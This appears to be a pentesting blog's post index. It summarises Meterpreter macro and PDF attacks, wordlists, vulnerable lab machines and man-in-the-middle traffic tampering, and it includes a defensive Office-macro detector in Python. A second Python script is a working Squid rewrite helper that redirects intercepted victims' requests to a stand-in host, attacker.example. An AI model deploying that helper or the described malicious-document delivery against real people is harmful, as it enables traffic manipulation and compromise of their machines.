Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer in this huge area. This is simply my findings, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just in a different light. I know there are more "things" to look for. It's just a basic & rough guide. Not every command will work on each system, as Linux varies so much. "It" will not jump off the screen - you have to hunt for that "little thing", as "the devil is in the detail".
Pentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP)
Up until a month or so ago, everything I've learnt was done by using various free resources online. Last month however, I became an "offsec" student. I enrolled on the "Pentesting with BackTrack" (PWB) course, currently version 3 (syllabus). After the lab time is over, the student has the option of sitting an exam. Upon passing the exam, the student is awarded an Offensive Security Certified Professional (OSCP) certificate. I now have that certificate =). This is my review of it all.
July 2011 - Misc
As I've been hiding under a rock as of late, I thought I would check in and explain what's on my "to do" list to try and make up for the lack of posts. Hopefully, over the next few weeks:
- I've got 15-ish videos in the works, ready to be recorded ...and on that note...
- Not far off the 50th video. I've got something in mind for it =)
- I'm long overdue with releasing updates for a couple of scripts (fakeAP_pwn & wiffy to name a few), as well as a few new ones.
- I've also been bouncing a few ideas for a future project, and, as a result, a couple of people are on board to give a hand for "bigger" things. When the time is right, I'll ask for more help - I need to get a "framework/structure" in place first. More details at a later date!
Metasploit vs Microsoft Office
Following on from the Adobe Reader post, another very common document format is Microsoft Office Word (.doc). This screencast demonstrates how embedding an evil 'macro' into a document can lead to compromising the target's computer.
A macro is an 'automated shortcut' for repeating tasks; in this case it is abused to execute a Meterpreter payload that connects back to the attacker. Even though the payload can be encoded in an attempt to bypass anti-virus, Microsoft Word may still block the macro from running, depending on the macro security level.
To infect the target, the attacker scans the network and finds an open shared folder to which they have read & write access. On viewing the contents of the folder, the attacker notices a Word document and replaces it with the macro-laden copy. However, the infected file could be delivered a number of different ways, such as emailing it to the target instead of scanning for and replacing an existing document.
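The defensive counterpart to this attack is checking whether a document carries a VBA project before anyone opens it. The following is an added example (not code from the original post): a small Python check that classifies an Office file as a modern OOXML document with or without an embedded VBA project, or as a legacy OLE2 container (the binary .doc format used in the screencast). The OOXML part names and the OLE2 magic bytes are from the public file formats; the sample documents are constructed in memory and are not real Word files. The legacy format stores macros inside an OLE2 "Macros" storage, which this example does not parse; it only flags the container so it can be handed to a proper OLE parser.

```python
import io
import zipfile

# Magic bytes of an OLE2 compound file, the container used by the legacy
# binary .doc/.xls formats.
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Where OOXML Office documents (.docm/.xlsm/.pptm) keep a VBA project.
VBA_PARTS = {"word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin"}


def classify_office_blob(data: bytes) -> str:
    """Return 'ooxml-macro', 'ooxml-clean', 'ole2-legacy' or 'unknown'."""
    if data.startswith(OLE2_MAGIC):
        # Legacy .doc/.xls: macros live in a 'Macros' storage inside the OLE2
        # container; inspecting that needs an OLE parser (e.g. olefile/oletools).
        return "ole2-legacy"
    if not data.startswith(b"PK\x03\x04"):
        return "unknown"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return "unknown"
    if "[Content_Types].xml" not in names:
        # Every OOXML package carries this part; without it this is just a zip.
        return "unknown"
    return "ooxml-macro" if names & VBA_PARTS else "ooxml-clean"


def build_sample(with_macro: bool) -> bytes:
    """Constructed stand-in for a Word OOXML package (not a real document).

    Only the parts the check looks at are present; the VBA project is a
    placeholder blob, since a real vbaProject.bin is a binary OLE stream.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00" * 16)  # placeholder
    return buf.getvalue()


if __name__ == "__main__":
    samples = [
        ("clean.docx", build_sample(False)),
        ("macro.docm", build_sample(True)),
        ("legacy.doc", OLE2_MAGIC + b"\x00" * 8),   # constructed header only
        ("notes.txt", b"just text"),
    ]
    for name, blob in samples:
        print(f"{name:12} -> {classify_office_blob(blob)}")
```

A result of `ooxml-macro` means the document will prompt for (or be blocked by) Word's macro security setting; it does not by itself prove the macro is malicious. Run the same classification over a share's contents before and after a suspected swap and the replaced document stands out.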
Dictionaries + Wordlists
In general, it's said that using a GOOD 'dictionary' or 'wordlist' (as far as I know, they're the same!) is 'key'. But what makes them GOOD? Most people will say 'the bigger, the better'; however, this isn't always the case... (for the record this isn't my opinion on the matter - more on this later).
Vulnerable by Design (Part 2)
OUTDATED.
SEE VULNHUB ~ http://vulnhub.com
Just a quick message, saying that I've (finally) updated an old post. I hope you find the new and updated challenges & puzzles useful. The updated complete list can be found here: https://blog.g0tmi1k.com/2011/03/vulnerable-by-design/.
Playing With Traffic (Squid)
Message from the author
Playing with traffic. Actually, it's more along the lines of "URL Manipulation"; however, that didn't sound as "catchy". I do plan to do another video on "Altering (web) content", which would be more accurate in regards to "Playing With Traffic". This would be done using Squid (instead of using Ettercap) - and I've had some ideas for when I do this too!
This was posted on "April Fools" (The time for pranks and "gotchas") and what seems to be a (harmless) "prank" is still an attack. This means you need permission to do it (just like everything else on this site!) - as you may capture/discover more than you planned. Like always, make sure you have permission, and, due to the content of one of these attacks, you need to make sure you don't expose "minors". On that note: you're on your own. What you do, is your doing. What you make happen is your responsibility. You have been warned.
And with all of that out-of-the-way...
There is more to "Man in the Middle" attacks than harvesting emails, passwords and cookies. For example, an attacker in that position could manipulate & alter the target's traffic to have some "malicious fun" (even though some of the scripts are "borderline childish"), which highlights the dangers of a "Man In The Middle" attack and what other abilities/options are available to the attacker. Below is a breakdown of the scripts demonstrated:
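To show what "URL manipulation" looks like once the attacker has the traffic flowing through a proxy, here is an added example (not one of the scripts from the post) of a Squid `url_rewrite_program` helper in Python. Squid keeps the helper running and feeds it one request per line on stdin (`[channel-ID] URL client/fqdn ident method kv-pairs...`); the helper answers with `OK rewrite-url=<url>` to fetch something else instead, or `ERR` to leave the request alone (this is the Squid 3.4+ reply format). The rules are constructed for the demo: every image request is silently rewritten to one picture, and one hostname is swapped for another. The hostnames `attacker.example` and `www.victim.example` are assumptions, not real infrastructure.

```python
#!/usr/bin/env python3
"""Squid url_rewrite_program helper demonstrating in-flight URL manipulation."""
import re
import sys
from typing import Optional

# Constructed rules (assumed hostnames): images -> one prank image,
# one site -> a host the attacker controls.
IMAGE_RE = re.compile(r"\.(?:jpe?g|png|gif)(?:\?.*)?$", re.IGNORECASE)
REPLACEMENT_IMAGE = "http://attacker.example/prank.jpg"
HOST_MAP = {"www.victim.example": "www.attacker.example"}
URL_RE = re.compile(r"^(https?://)([^/:]+)(.*)$")


def rewrite(url: str) -> Optional[str]:
    """Return the URL Squid should fetch instead, or None to leave it alone."""
    if IMAGE_RE.search(url):
        return REPLACEMENT_IMAGE
    m = URL_RE.match(url)
    if m and m.group(2) in HOST_MAP:
        return m.group(1) + HOST_MAP[m.group(2)] + m.group(3)
    return None


def handle_line(line: str) -> str:
    """Translate one Squid request line into a helper reply.

    With url_rewrite_children concurrency > 0 the line starts with a numeric
    channel-ID that must be echoed back; otherwise the URL is the first field.
    """
    fields = line.strip().split()
    if not fields:
        return "BH"  # broken helper input
    channel = ""
    if fields[0].isdigit() and len(fields) > 1:
        channel = fields[0] + " "
        fields = fields[1:]
    new_url = rewrite(fields[0])
    if new_url is None:
        return channel + "ERR"
    return channel + "OK rewrite-url=" + new_url


def main() -> None:
    # Squid never closes stdin while the helper is alive; flush per reply so
    # the proxy is not left waiting on buffered output.
    for line in sys.stdin:
        sys.stdout.write(handle_line(line) + "\n")
        sys.stdout.flush()


if __name__ == "__main__":
    main()
```

Wire it in with `url_rewrite_program /path/to/rewrite.py` and `url_rewrite_children 5 concurrency=10` in squid.conf, then point the intercepted traffic at the proxy. Because the rewrite happens before Squid fetches the object, the client sees the replacement at the original URL; plain HTTP only, since a TLS-protected request never reaches the helper as a URL the proxy can read.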
Metasploit vs. Adobe PDFs
This screencast demonstrates vulnerabilities in Adobe Reader. Instead of creating a mass of malicious files, the attacker creates two PDFs: one requires no user interaction but crashes the reader, whereas the other requires the user to click through a few warning screens but then presents them with a document.
The attacker emails these documents to the target (compressing & encrypting them first).
Owning Windows (XP SP3 vs. Metasploit's File_autopwn)
This screencast demonstrates Metasploit's ability (via file_autopwn) to automatically generate malicious files which, when opened by a particular application, exploit it.
After choosing a file to use, the attacker sends an email to the target with a masked URL to the malicious file and a link to the application - the "correct" (vulnerable) version of it too!
Kioptrix - Level 1 (Samba)
Kioptrix is another "Vulnerable-By-Design OS" (like De-ICE, Metasploitable and pWnOS), with the aim of going from "boot" to "root" by any means possible. This is the second video on it; the first one is here. Unlike last time, the entry method was via a Samba weakness, which is a quick attack and goes straight to root.